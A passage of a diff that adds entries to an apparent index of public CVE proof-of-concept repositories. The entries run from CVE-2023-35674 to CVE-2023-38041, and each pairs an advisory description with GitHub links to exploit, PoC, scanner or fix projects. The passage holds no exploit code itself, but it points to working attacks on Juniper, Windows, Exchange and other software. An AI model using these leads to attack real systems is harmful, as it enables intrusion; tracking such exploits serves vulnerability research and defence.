+In onCreate of WindowState.java, there is a possible way to launch a background activity due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
+
+
+- [Thampakon/CVE-2023-35674](https://github.com/Thampakon/CVE-2023-35674)
+
+### CVE-2023-35687 (2023-09-11)
+
+In MtpPropertyValue of MtpProperty.h, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
+
+
+- [pazhanivel07/frameworks_av_AOSP_10_r33_CVE-2023-35687_CVE-2023-35679](https://github.com/pazhanivel07/frameworks_av_AOSP_10_r33_CVE-2023-35687_CVE-2023-35679)
+
+### CVE-2023-35744 (2024-05-03)
+
+D-Link DAP-2622 DDP Configuration Restore Server IPv6 Address Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20071.
+
+
+- [ADSSA-IT/CVE-2023-35744](https://github.com/ADSSA-IT/CVE-2023-35744)
+
+### CVE-2023-35793 (2023-09-26)
+
+An issue was discovered in Cassia Access Controller 2.1.1.2303271039. Establishing a web SSH session to gateways is vulnerable to Cross Site Request Forgery (CSRF) attacks.
+
+
+- [Dodge-MPTC/CVE-2023-35793-CSRF-On-Web-SSH](https://github.com/Dodge-MPTC/CVE-2023-35793-CSRF-On-Web-SSH)
+
+### CVE-2023-35794 (2023-10-27)
+
+An issue was discovered in Cassia Access Controller 2.1.1.2303271039. The Web SSH terminal endpoint (spawned console) can be accessed without authentication. Specifically, there is no session cookie validation on the Access Controller; instead, there is only Basic Authentication to the SSH console.
+
+
+- [Dodge-MPTC/CVE-2023-35794-WebSSH-Hijacking](https://github.com/Dodge-MPTC/CVE-2023-35794-WebSSH-Hijacking)
+
+### CVE-2023-35801 (2023-06-23)
+
+A directory traversal vulnerability in Safe Software FME Server before 2022.2.5 allows an attacker to bypass validation when editing a network-based resource connection, resulting in the unauthorized reading and writing of arbitrary files. Successful exploitation requires an attacker to have access to a user account with write privileges. FME Flow 2023.0 is also a fixed version.
+
+
+- [trustcves/CVE-2023-35801](https://github.com/trustcves/CVE-2023-35801)
+
+### CVE-2023-35803 (2023-10-04)
+
+IQ Engine before 10.6r2 on Extreme Network AP devices has a Buffer Overflow.
+
+
+- [lachlan2k/CVE-2023-35803](https://github.com/lachlan2k/CVE-2023-35803)
+
+### CVE-2023-35813 (2023-06-17)
+
+Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3.
+
+
+- [aalexpereira/CVE-2023-35813](https://github.com/aalexpereira/CVE-2023-35813)
+- [BagheeraAltered/CVE-2023-35813-PoC](https://github.com/BagheeraAltered/CVE-2023-35813-PoC)
+
+### CVE-2023-35828 (2023-06-18)
+
+An issue was discovered in the Linux kernel before 6.3.2. A use-after-free was found in renesas_usb3_remove in drivers/usb/gadget/udc/renesas_usb3.c.
+
+
+- [Trinadh465/linux-4.19.72_CVE-2023-35828](https://github.com/Trinadh465/linux-4.19.72_CVE-2023-35828)
+
+### CVE-2023-35843 (2023-06-19)
+
+NocoDB through 0.106.0 (or 0.109.1) has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.
+
+
+- [b3nguang/CVE-2023-35843](https://github.com/b3nguang/CVE-2023-35843)
+
+### CVE-2023-35885 (2023-06-20)
+
+CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication.
+
+
+- [Chocapikk/CVE-2023-35885](https://github.com/Chocapikk/CVE-2023-35885)
+
+### CVE-2023-35985 (2023-11-27)
+
+An arbitrary file creation vulnerability exists in the Javascript exportDataObject API of Foxit Reader 12.1.3.15356 due to a failure to properly validate a dangerous extension. A specially crafted malicious file can create files at arbitrary locations, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially-crafted malicious site if the browser plugin extension is enabled.
+
+
+- [SpiralBL0CK/-CVE-2023-35985](https://github.com/SpiralBL0CK/-CVE-2023-35985)
+
+### CVE-2023-36003 (2023-12-12)
+
+XAML Diagnostics Elevation of Privilege Vulnerability
+
+
+- [m417z/CVE-2023-36003-POC](https://github.com/m417z/CVE-2023-36003-POC)
+- [baph0m3th/CVE-2023-36003](https://github.com/baph0m3th/CVE-2023-36003)
+
+### CVE-2023-36025 (2023-11-14)
+
+Windows SmartScreen Security Feature Bypass Vulnerability
+
+
+- [ka7ana/CVE-2023-36025](https://github.com/ka7ana/CVE-2023-36025)
+- [J466Y/test_CVE-2023-36025](https://github.com/J466Y/test_CVE-2023-36025)
+- [coolman6942o/-EXPLOIT-CVE-2023-36025](https://github.com/coolman6942o/-EXPLOIT-CVE-2023-36025)
+
+### CVE-2023-36076 (2023-09-01)
+
+SQL Injection vulnerability in smanga version 3.1.9 and earlier, allows remote attackers to execute arbitrary code and gain sensitive information via mediaId, mangaId, and userId parameters in php/history/add.php.
+
+
+- [deIndra/CVE-2023-36076](https://github.com/deIndra/CVE-2023-36076)
+
+### CVE-2023-36085 (2023-10-24)
+
+The sisqualWFM 7.1.319.103 thru 7.1.319.111 for Android, has a host header injection vulnerability in its "/sisqualIdentityServer/core/" endpoint. By modifying the HTTP Host header, an attacker can change webpage links and even redirect users to arbitrary or malicious locations. This can lead to phishing attacks, malware distribution, and unauthorized access to sensitive resources.
+
+
+- [omershaik0/CVE-2023-36085_SISQUALWFM-Host-Header-Injection](https://github.com/omershaik0/CVE-2023-36085_SISQUALWFM-Host-Header-Injection)
+
+### CVE-2023-36109 (2023-09-20)
+
+Buffer Overflow vulnerability in JerryScript version 3.0, allows remote attackers to execute arbitrary code via ecma_stringbuilder_append_raw component at /jerry-core/ecma/base/ecma-helpers-string.c.
+
+
+- [Limesss/CVE-2023-36109](https://github.com/Limesss/CVE-2023-36109)
+
+### CVE-2023-36123 (2023-10-06)
+
+Directory Traversal vulnerability in Hex-Dragon Plain Craft Launcher 2 version Alpha 1.3.9, allows local attackers to execute arbitrary code and gain sensitive information.
+
+
+- [9Bakabaka/CVE-2023-36123](https://github.com/9Bakabaka/CVE-2023-36123)
+
+### CVE-2023-36143 (2023-06-30)
+
+Maxprint Maxlink 1200G v3.4.11E has an OS command injection vulnerability in the "Diagnostic tool" functionality of the device.
+
+
+- [RobinTrigon/CVE-2023-36143](https://github.com/RobinTrigon/CVE-2023-36143)
+
+### CVE-2023-36158 (2023-08-03)
+
+Cross Site Scripting (XSS) vulnerability in sourcecodester Toll Tax Management System 1.0 allows remote attackers to run arbitrary code via the First Name and Last Name fields on the My Account page.
+
+
+- [unknown00759/CVE-2023-36158](https://github.com/unknown00759/CVE-2023-36158)
+
+### CVE-2023-36159 (2023-08-03)
+
+Cross Site Scripting (XSS) vulnerability in sourcecodester Lost and Found Information System 1.0 allows remote attackers to run arbitrary code via the First Name, Middle Name and Last Name fields on the Create User page.
+
+
+- [unknown00759/CVE-2023-36159](https://github.com/unknown00759/CVE-2023-36159)
+
+### CVE-2023-36163 (2023-07-11)
+
+Cross Site Scripting vulnerability in IP-DOT BuildaGate v.BuildaGate5 allows a remote attacker to execute arbitrary code via a crafted script to the mc parameter of the URL.
+
+
+- [TraiLeR2/CVE-2023-36163](https://github.com/TraiLeR2/CVE-2023-36163)
+
+### CVE-2023-36164
+- [TraiLeR2/CVE-2023-36164](https://github.com/TraiLeR2/CVE-2023-36164)
+
+### CVE-2023-36165
+- [TraiLeR2/CVE-2023-36165](https://github.com/TraiLeR2/CVE-2023-36165)
+
+### CVE-2023-36168
+- [TraiLeR2/CVE-2023-36168](https://github.com/TraiLeR2/CVE-2023-36168)
+
+### CVE-2023-36169
+- [TraiLeR2/CVE-2023-36169](https://github.com/TraiLeR2/CVE-2023-36169)
+
+### CVE-2023-36250 (2023-09-14)
+
+CSV Injection vulnerability in GNOME time tracker version 3.0.2, allows local attackers to execute arbitrary code via crafted .tsv file when creating a new record.
+
+
+- [BrunoTeixeira1996/CVE-2023-36250](https://github.com/BrunoTeixeira1996/CVE-2023-36250)
+
+### CVE-2023-36281 (2023-08-22)
+
+An issue in langchain v.0.0.171 allows a remote attacker to execute arbitrary code via a JSON file to load_prompt. This is related to __subclasses__ or a template.
+
+
+- [tagomaru/CVE-2023-36281](https://github.com/tagomaru/CVE-2023-36281)
+- [miguelc49/CVE-2023-36281-2](https://github.com/miguelc49/CVE-2023-36281-2)
+- [miguelc49/CVE-2023-36281-1](https://github.com/miguelc49/CVE-2023-36281-1)
+
+### CVE-2023-36319 (2023-09-19)
+
+File Upload vulnerability in Openupload Stable v.0.4.3 allows a remote attacker to execute arbitrary code via the action parameter of the compress-inc.php file.
+
+
+- [Lowalu/CVE-2023-36319](https://github.com/Lowalu/CVE-2023-36319)
+
+### CVE-2023-36407 (2023-11-14)
+
+Windows Hyper-V Elevation of Privilege Vulnerability
+
+
+- [zha0/CVE-2023-36407](https://github.com/zha0/CVE-2023-36407)
+- [pwndorei/CVE-2023-36407](https://github.com/pwndorei/CVE-2023-36407)
+
+### CVE-2023-36424 (2023-11-14)
+
+Windows Common Log File System Driver Elevation of Privilege Vulnerability
+
+
+- [Nassim-Asrir/CVE-2023-36424](https://github.com/Nassim-Asrir/CVE-2023-36424)
+
+### CVE-2023-36427 (2023-11-14)
+
+Windows Hyper-V Elevation of Privilege Vulnerability
+
+
+- [tandasat/CVE-2023-36427](https://github.com/tandasat/CVE-2023-36427)
+
+### CVE-2023-36531
+- [RandomRobbieBF/CVE-2023-36531](https://github.com/RandomRobbieBF/CVE-2023-36531)
+
+### CVE-2023-36643 (2024-04-04)
+
+Incorrect Access Control in ITB-GmbH TradePro v9.5, allows remote attackers to receive all orders from the online shop via oordershow component in customer function.
+
+
+- [caffeinated-labs/CVE-2023-36643](https://github.com/caffeinated-labs/CVE-2023-36643)
+
+### CVE-2023-36644 (2024-04-04)
+
+Incorrect Access Control in ITB-GmbH TradePro v9.5, allows remote attackers to receive all order confirmations from the online shop via the printmail plugin.
+
+
+- [caffeinated-labs/CVE-2023-36644](https://github.com/caffeinated-labs/CVE-2023-36644)
+
+### CVE-2023-36645 (2024-04-04)
+
+SQL injection vulnerability in ITB-GmbH TradePro v9.5, allows remote attackers to run SQL queries via oordershow component in customer function.
+
+
+- [caffeinated-labs/CVE-2023-36645](https://github.com/caffeinated-labs/CVE-2023-36645)
+
+### CVE-2023-36664 (2023-06-25)
+
+Artifex Ghostscript through 10.01.2 mishandles permission validation for pipe devices (with the %pipe% prefix or the | pipe character prefix).
+
+
+- [jakabakos/CVE-2023-36664-Ghostscript-command-injection](https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection)
+- [winkler-winsen/Scan_GhostScript](https://github.com/winkler-winsen/Scan_GhostScript)
+- [jeanchpt/CVE-2023-36664](https://github.com/jeanchpt/CVE-2023-36664)
+- [churamanib/CVE-2023-36664-Ghostscript-command-injection](https://github.com/churamanib/CVE-2023-36664-Ghostscript-command-injection)
+
+### CVE-2023-36723 (2023-10-10)
+
+Windows Container Manager Service Elevation of Privilege Vulnerability
+
+
+- [Wh04m1001/CVE-2023-36723](https://github.com/Wh04m1001/CVE-2023-36723)
+
+### CVE-2023-36745 (2023-09-12)
+
+Microsoft Exchange Server Remote Code Execution Vulnerability
+
+
+- [N1k0la-T/CVE-2023-36745](https://github.com/N1k0la-T/CVE-2023-36745)
+
+### CVE-2023-36802 (2023-09-12)
+
+Microsoft Streaming Service Proxy Elevation of Privilege Vulnerability
+
+
+- [chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802](https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802)
+- [4zur-0312/CVE-2023-36802](https://github.com/4zur-0312/CVE-2023-36802)
+- [x0rb3l/CVE-2023-36802-MSKSSRV-LPE](https://github.com/x0rb3l/CVE-2023-36802-MSKSSRV-LPE)
+- [Nero22k/cve-2023-36802](https://github.com/Nero22k/cve-2023-36802)
+- [ISH2YU/CVE-2023-36802](https://github.com/ISH2YU/CVE-2023-36802)
+
+### CVE-2023-36812 (2023-06-30)
+
+OpenTSDB is a open source, distributed, scalable Time Series Database (TSDB). OpenTSDB is vulnerable to Remote Code Execution vulnerability by writing user-controlled input to Gnuplot configuration file and running Gnuplot with the generated configuration. This issue has been patched in commit `07c4641471c` and further refined in commit `fa88d3e4b`. These patches are available in the `2.4.2` release. Users are advised to upgrade. User unable to upgrade may disable Gunuplot via the config option`tsd.core.enable_ui = true` and remove the shell files `mygnuplot.bat` and `mygnuplot.sh`.
+
+
+- [ErikWynter/opentsdb_key_cmd_injection](https://github.com/ErikWynter/opentsdb_key_cmd_injection)
+
+### CVE-2023-36844 (2023-08-17)
+
+A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environment variables.\n\nUsing a crafted request an attacker is able to modify \n\ncertain PHP environment variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\nThis issue affects Juniper Networks Junos OS on EX Series:\n\n\n\n * All versions prior to 20.4R3-S9;\n * 21.1 versions 21.1R1 and later;\n * 21.2 versions prior to 21.2R3-S7;\n * 21.3 versions \n\nprior to \n\n 21.3R3-S5;\n * 21.4 versions \n\nprior to \n\n21.4R3-S5;\n * 22.1 versions \n\nprior to \n\n22.1R3-S4;\n * 22.2 versions \n\nprior to \n\n22.2R3-S2;\n * 22.3 versions \n\nprior to 22.3R3-S1;\n * 22.4 versions \n\nprior to \n\n22.4R2-S2, 22.4R3;\n * 23.2 versions prior to \n\n23.2R1-S1, 23.2R2.\n\n\n\n\n
+
+
+- [watchtowrlabs/juniper-rce_cve-2023-36844](https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844)
+- [ThatNotEasy/CVE-2023-36844](https://github.com/ThatNotEasy/CVE-2023-36844)
+- [r3dcl1ff/CVE-2023-36844_Juniper_RCE](https://github.com/r3dcl1ff/CVE-2023-36844_Juniper_RCE)
+
+### CVE-2023-36845 (2023-08-17)
+
+A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series \n\nand SRX Series \n\nallows an unauthenticated, network-based attacker to remotely execute code.\n\nUsing a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection und execution of code.\n\n\nThis issue affects Juniper Networks Junos OS on EX Series\n\n\nand \n\n\nSRX Series:\n\n\n\n * All versions prior to \n\n20.4R3-S9;\n * 21.1 versions 21.1R1 and later;\n * 21.2 versions prior to 21.2R3-S7;\n * 21.3 versions prior to 21.3R3-S5;\n * 21.4 versions prior to 21.4R3-S5;\n * 22.1 versions \n\nprior to \n\n22.1R3-S4;\n * 22.2 versions \n\nprior to \n\n22.2R3-S2;\n * 22.3 versions \n\nprior to \n\n22.3R2-S2, 22.3R3-S1;\n * 22.4 versions \n\nprior to \n\n22.4R2-S1, 22.4R3;\n * 23.2 versions prior to 23.2R1-S1, 23.2R2.\n\n\n\n\n
+
+
+- [vulncheck-oss/cve-2023-36845-scanner](https://github.com/vulncheck-oss/cve-2023-36845-scanner)
+- [kljunowsky/CVE-2023-36845](https://github.com/kljunowsky/CVE-2023-36845)
+- [toanln-cov/CVE-2023-36845](https://github.com/toanln-cov/CVE-2023-36845)
+- [halencarjunior/CVE-2023-36845](https://github.com/halencarjunior/CVE-2023-36845)
+- [zaenhaxor/CVE-2023-36845](https://github.com/zaenhaxor/CVE-2023-36845)
+- [simrotion13/CVE-2023-36845](https://github.com/simrotion13/CVE-2023-36845)
+- [cyberh3als/CVE-2023-36845-POC](https://github.com/cyberh3als/CVE-2023-36845-POC)
+- [3yujw7njai/ansible-cve-2023-36845](https://github.com/3yujw7njai/ansible-cve-2023-36845)
+- [Asbawy/Automation-for-Juniper-cve-2023-36845](https://github.com/Asbawy/Automation-for-Juniper-cve-2023-36845)
+- [jahithoque/Juniper-CVE-2023-36845-Mass-Hunting](https://github.com/jahithoque/Juniper-CVE-2023-36845-Mass-Hunting)
+- [cyb3rzest/Juniper-Bug-Automation-CVE-2023-36845](https://github.com/cyb3rzest/Juniper-Bug-Automation-CVE-2023-36845)
+- [CharonDefalt/Juniper-exploit-CVE-2023-36845](https://github.com/CharonDefalt/Juniper-exploit-CVE-2023-36845)
+- [iveresk/CVE-2023-36845-6-](https://github.com/iveresk/CVE-2023-36845-6-)
+- [ak1t4/CVE-2023-36845](https://github.com/ak1t4/CVE-2023-36845)
+- [0xNehru/CVE-2023-36845-Juniper-Vulnerability](https://github.com/0xNehru/CVE-2023-36845-Juniper-Vulnerability)
+- [imhunterand/CVE-2023-36845](https://github.com/imhunterand/CVE-2023-36845)
+- [ifconfig-me/CVE-2023-36845](https://github.com/ifconfig-me/CVE-2023-36845)
+- [e11i0t4lders0n/CVE-2023-36845](https://github.com/e11i0t4lders0n/CVE-2023-36845)
+- [Vignesh2712/Automation-for-Juniper-cve-2023-36845](https://github.com/Vignesh2712/Automation-for-Juniper-cve-2023-36845)
+
+### CVE-2023-36846 (2023-08-17)
+
+A Missing Authentication for Critical Function vulnerability in Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause limited impact to the file system integrity.\n\n\n\nWith a specific request to user.php that doesn't require authentication an attacker is able to upload arbitrary files via J-Web, leading to a loss of \n\nintegrity\n\nfor a certain \n\npart of the file system, which may allow chaining to other vulnerabilities.\n\n\nThis issue affects Juniper Networks Junos OS on SRX Series:\n\n\n\n * All versions prior to 20.4R3-S8;\n * 21.1 versions 21.1R1 and later;\n * 21.2 versions prior to 21.2R3-S6;\n * 21.3 versions \n\nprior to \n\n 21.3R3-S5;\n * 21.4 versions \n\nprior to \n\n21.4R3-S5;\n * 22.1 versions \n\nprior to \n\n22.1R3-S3;\n * 22.2 versions \n\nprior to \n\n22.2R3-S2;\n * 22.3 versions \n\nprior to \n\n22.3R2-S2, 22.3R3;\n * 22.4 versions \n\nprior to \n\n22.4R2-S1, 22.4R3.\n\n\n\n\n
+
+
+- [Chocapikk/CVE-2023-36846](https://github.com/Chocapikk/CVE-2023-36846)
+
+### CVE-2023-36874 (2023-07-11)
+
+Windows Error Reporting Service Elevation of Privilege Vulnerability
+
+
+- [d0rb/CVE-2023-36874](https://github.com/d0rb/CVE-2023-36874)
+- [crisprss/CVE-2023-36874](https://github.com/crisprss/CVE-2023-36874)
+- [Wh04m1001/CVE-2023-36874](https://github.com/Wh04m1001/CVE-2023-36874)
+- [Octoberfest7/CVE-2023-36874_BOF](https://github.com/Octoberfest7/CVE-2023-36874_BOF)
+
+### CVE-2023-36884 (2023-07-11)
+
+Windows Search Remote Code Execution Vulnerability
+
+
+- [Maxwitat/CVE-2023-36884-Scripts-for-Intune-Remediation-SCCM-Compliance-Baseline](https://github.com/Maxwitat/CVE-2023-36884-Scripts-for-Intune-Remediation-SCCM-Compliance-Baseline)
+- [deepinstinct/Storm0978-RomCom-Campaign](https://github.com/deepinstinct/Storm0978-RomCom-Campaign)
+- [zerosorai/CVE-2023-36884](https://github.com/zerosorai/CVE-2023-36884)
+- [tarraschk/CVE-2023-36884-Checker](https://github.com/tarraschk/CVE-2023-36884-Checker)
+- [or2me/CVE-2023-36884_patcher](https://github.com/or2me/CVE-2023-36884_patcher)
+- [ToddMaxey/CVE-2023-36884](https://github.com/ToddMaxey/CVE-2023-36884)
+- [ridsoliveira/Fix-CVE-2023-36884](https://github.com/ridsoliveira/Fix-CVE-2023-36884)
+- [raresteak/CVE-2023-36884](https://github.com/raresteak/CVE-2023-36884)
+- [jakabakos/CVE-2023-36884-MS-Office-HTML-RCE](https://github.com/jakabakos/CVE-2023-36884-MS-Office-HTML-RCE)
+
+### CVE-2023-36899 (2023-08-08)
+
+ASP.NET Elevation of Privilege Vulnerability
+
+
+- [d0rb/CVE-2023-36899](https://github.com/d0rb/CVE-2023-36899)
+- [midisec/CVE-2023-36899](https://github.com/midisec/CVE-2023-36899)
+
+### CVE-2023-36900 (2023-08-08)
+
+Windows Common Log File System Driver Elevation of Privilege Vulnerability
+
+
+- [RomanRybachek/CVE-2023-36900](https://github.com/RomanRybachek/CVE-2023-36900)
+
+### CVE-2023-37073
+- [Hamza0X/CVE-2023-37073](https://github.com/Hamza0X/CVE-2023-37073)
+
+### CVE-2023-37164 (2023-07-20)
+
+Diafan CMS v6.0 was discovered to contain a reflected cross-site scripting via the cat_id parameter at /shop/?module=shop&action=search.
+
+
+- [ilqarli27/CVE-2023-37164](https://github.com/ilqarli27/CVE-2023-37164)
+
+### CVE-2023-37189 (2023-07-11)
+
+A stored cross site scripting (XSS) vulnerability in index.php?menu=billing_rates of Issabel PBX version 4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the Name or Prefix fields under the Create New Rate module.
+
+
+- [sahiloj/CVE-2023-37189](https://github.com/sahiloj/CVE-2023-37189)
+
+### CVE-2023-37190 (2023-07-11)
+
+A stored cross-site scripting (XSS) vulnerability in Issabel issabel-pbx v.4.0.0-6 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Virtual Fax Name and Caller ID Name parameters under the New Virtual Fax feature.
+
+
+- [sahiloj/CVE-2023-37190](https://github.com/sahiloj/CVE-2023-37190)
+
+### CVE-2023-37191 (2023-07-11)
+
+A stored cross-site scripting (XSS) vulnerability in Issabel issabel-pbx v.4.0.0-6 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Group and Description parameters.
+
+
+- [sahiloj/CVE-2023-37191](https://github.com/sahiloj/CVE-2023-37191)
+
+### CVE-2023-37250 (2023-08-20)
+
+Unity Parsec has a TOCTOU race condition that permits local attackers to escalate privileges to SYSTEM if Parsec was installed in "Per User" mode. The application intentionally launches DLLs from a user-owned directory but intended to always perform integrity verification of those DLLs. This affects Parsec Loader versions through 8. Parsec Loader 9 is a fixed version.
+
+
+- [ewilded/CVE-2023-37250-POC](https://github.com/ewilded/CVE-2023-37250-POC)
+
+### CVE-2023-37474 (2023-07-14)
+
+Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. This issue has been addressed in commit `043e3c7d` which has been included in release 1.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.
+
+
+- [ilqarli27/CVE-2023-37474](https://github.com/ilqarli27/CVE-2023-37474)
+
+### CVE-2023-37478 (2023-08-01)
+
+pnpm is a package manager. It is possible to construct a tarball that, when installed via npm or parsed by the registry is safe, but when installed via pnpm is malicious, due to how pnpm parses tar archives. This can result in a package that appears safe on the npm registry or when installed via npm being replaced with a compromised or malicious version when installed via pnpm. This issue has been patched in version(s) 7.33.4 and 8.6.8.
+
+
+- [TrevorGKann/CVE-2023-37478_npm_vs_pnpm](https://github.com/TrevorGKann/CVE-2023-37478_npm_vs_pnpm)
+- [li-minhao/CVE-2023-37478-Demo](https://github.com/li-minhao/CVE-2023-37478-Demo)
+
+### CVE-2023-37582 (2023-07-12)
+
+The RocketMQ NameServer component still has a remote command execution vulnerability as the CVE-2023-33246 issue was not completely fixed in version 5.1.1. \n\nWhen NameServer address are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function on the NameServer component to execute commands as the system users that RocketMQ is running as. \n\nIt is recommended for users to upgrade their NameServer version to 5.1.2 or above for RocketMQ 5.x or 4.9.7 or above for RocketMQ 4.x to prevent these attacks.\n
+
+
+- [Malayke/CVE-2023-37582_EXPLOIT](https://github.com/Malayke/CVE-2023-37582_EXPLOIT)
+
+### CVE-2023-37596 (2023-07-11)
+
+Cross Site Request Forgery (CSRF) vulnerability in issabel-pbx v.4.0.0-6 allows a remote attacker to cause a denial of service via a crafted script to the deleteuser function.
+
+
+- [sahiloj/CVE-2023-37596](https://github.com/sahiloj/CVE-2023-37596)
+
+### CVE-2023-37597 (2023-07-11)
+
+Cross Site Request Forgery (CSRF) vulnerability in issabel-pbx v.4.0.0-6 allows a remote attacker to cause a denial of service via the delete user grouplist function.
+
+
+- [sahiloj/CVE-2023-37597](https://github.com/sahiloj/CVE-2023-37597)
+
+### CVE-2023-37598 (2023-07-13)
+
+A Cross Site Request Forgery (CSRF) vulnerability in issabel-pbx v.4.0.0-6 allows a remote attacker to cause a denial of service via the delete new virtual fax function.
+
+
+- [sahiloj/CVE-2023-37598](https://github.com/sahiloj/CVE-2023-37598)
+
+### CVE-2023-37599 (2023-07-13)
+
+An issue in issabel-pbx v.4.0.0-6 allows a remote attacker to obtain sensitive information via the modules directory
+
+
+- [sahiloj/CVE-2023-37599](https://github.com/sahiloj/CVE-2023-37599)
+
+### CVE-2023-37625 (2023-08-10)
+
+A stored cross-site scripting (XSS) vulnerability in Netbox v3.4.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Custom Link templates.
+
+
+- [benjaminpsinclair/Netbox-CVE-2023-37625](https://github.com/benjaminpsinclair/Netbox-CVE-2023-37625)
+
+### CVE-2023-37739 (2023-09-14)
+
+i-doit Pro v25 and below was discovered to be vulnerable to path traversal.
+
+
+- [leekenghwa/CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below](https://github.com/leekenghwa/CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below)
+
+### CVE-2023-37755 (2023-09-14)
+
+i-doit pro 25 and below and I-doit open 25 and below are configured with insecure default administrator credentials, and there is no warning or prompt to ask users to change the default password and account name. Unauthenticated attackers can exploit this vulnerability to obtain Administrator privileges, resulting in them being able to perform arbitrary system operations or cause a Denial of Service (DoS).
+
+
+- [leekenghwa/CVE-2023-37755---Hardcoded-Admin-Credential-in-i-doit-Pro-25-and-below](https://github.com/leekenghwa/CVE-2023-37755---Hardcoded-Admin-Credential-in-i-doit-Pro-25-and-below)
+
+### CVE-2023-37756 (2023-09-14)
+
+I-doit pro 25 and below and I-doit open 25 and below employ weak password requirements for Administrator account creation. Attackers are able to easily guess users' passwords via a bruteforce attack.
+
+
+- [leekenghwa/CVE-2023-37756-CWE-521-lead-to-malicious-plugin-upload-in-the-i-doit-Pro-25-and-below](https://github.com/leekenghwa/CVE-2023-37756-CWE-521-lead-to-malicious-plugin-upload-in-the-i-doit-Pro-25-and-below)
+
+### CVE-2023-37771 (2023-07-31)
+
+Art Gallery Management System v1.0 contains a SQL injection vulnerability via the cid parameter at /agms/product.php.
+
+
+- [anky-123/CVE-2023-37771](https://github.com/anky-123/CVE-2023-37771)
+
+### CVE-2023-37772 (2023-08-01)
+
+Online Shopping Portal Project v3.1 was discovered to contain a SQL injection vulnerability via the Email parameter at /shopping/login.php.
+
+
+- [anky-123/CVE-2023-37772](https://github.com/anky-123/CVE-2023-37772)
+
+### CVE-2023-37778
+- [jyoti818680/CVE-2023-37778](https://github.com/jyoti818680/CVE-2023-37778)
+
+### CVE-2023-37779
+- [jyoti818680/CVE-2023-37779](https://github.com/jyoti818680/CVE-2023-37779)
+
+### CVE-2023-37786 (2023-07-13)
+
+Multiple cross-site scripting (XSS) vulnerabilities in Geeklog v2.2.2 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Mail Settings[backend], Mail Settings[host], Mail Settings[port] and Mail Settings[auth] parameters of the /admin/configuration.php.
+
+
+- [Phamchie/CVE-2023-37786](https://github.com/Phamchie/CVE-2023-37786)
+
+### CVE-2023-37790 (2023-11-08)
+
+Jaspersoft Clarity PPM version 14.3.0.298 was discovered to contain an arbitrary file upload vulnerability via the Profile Picture Upload function.
+
+
+- [kaizensecurity/CVE-2023-37790](https://github.com/kaizensecurity/CVE-2023-37790)
+
+### CVE-2023-37800
+- [TraiLeR2/CVE-2023-37800](https://github.com/TraiLeR2/CVE-2023-37800)
+
+### CVE-2023-37903 (2023-07-21)
+
+vm2 is an open source vm/sandbox for Node.js. In vm2 for versions up to and including 3.9.19, Node.js custom inspect function allows attackers to escape the sandbox and run arbitrary code. This may result in Remote Code Execution, assuming the attacker has arbitrary code execution primitive inside the context of vm2 sandbox. There are no patches and no known workarounds. Users are advised to find an alternative software.
+
+
+- [7h3h4ckv157/CVE-2023-37903](https://github.com/7h3h4ckv157/CVE-2023-37903)
+
+### CVE-2023-37979 (2023-07-27)
+
+Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Saturday Drive Ninja Forms Contact Form plugin <= 3.6.25 versions.
+
+
+- [Mehran-Seifalinia/CVE-2023-37979](https://github.com/Mehran-Seifalinia/CVE-2023-37979)
+- [d0rb/CVE-2023-37979](https://github.com/d0rb/CVE-2023-37979)
+
+### CVE-2023-38035 (2023-08-21)
+
+A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.
+
+
+- [horizon3ai/CVE-2023-38035](https://github.com/horizon3ai/CVE-2023-38035)
+- [LeakIX/sentryexploit](https://github.com/LeakIX/sentryexploit)
+- [mind2hex/CVE-2023-38035](https://github.com/mind2hex/CVE-2023-38035)
+
+### CVE-2023-38039 (2023-09-15)
+
+When curl retrieves an HTTP response, it stores the incoming headers so that\nthey can be accessed later via the libcurl headers API.\n\nHowever, curl did not have a limit in how many or how large headers it would\naccept in a response, allowing a malicious server to stream an endless series\nof headers and eventually cause curl to run out of heap memory.
+
+
+- [Smartkeyss/CVE-2023-38039](https://github.com/Smartkeyss/CVE-2023-38039)
+
+### CVE-2023-38041 (2023-10-25)
+
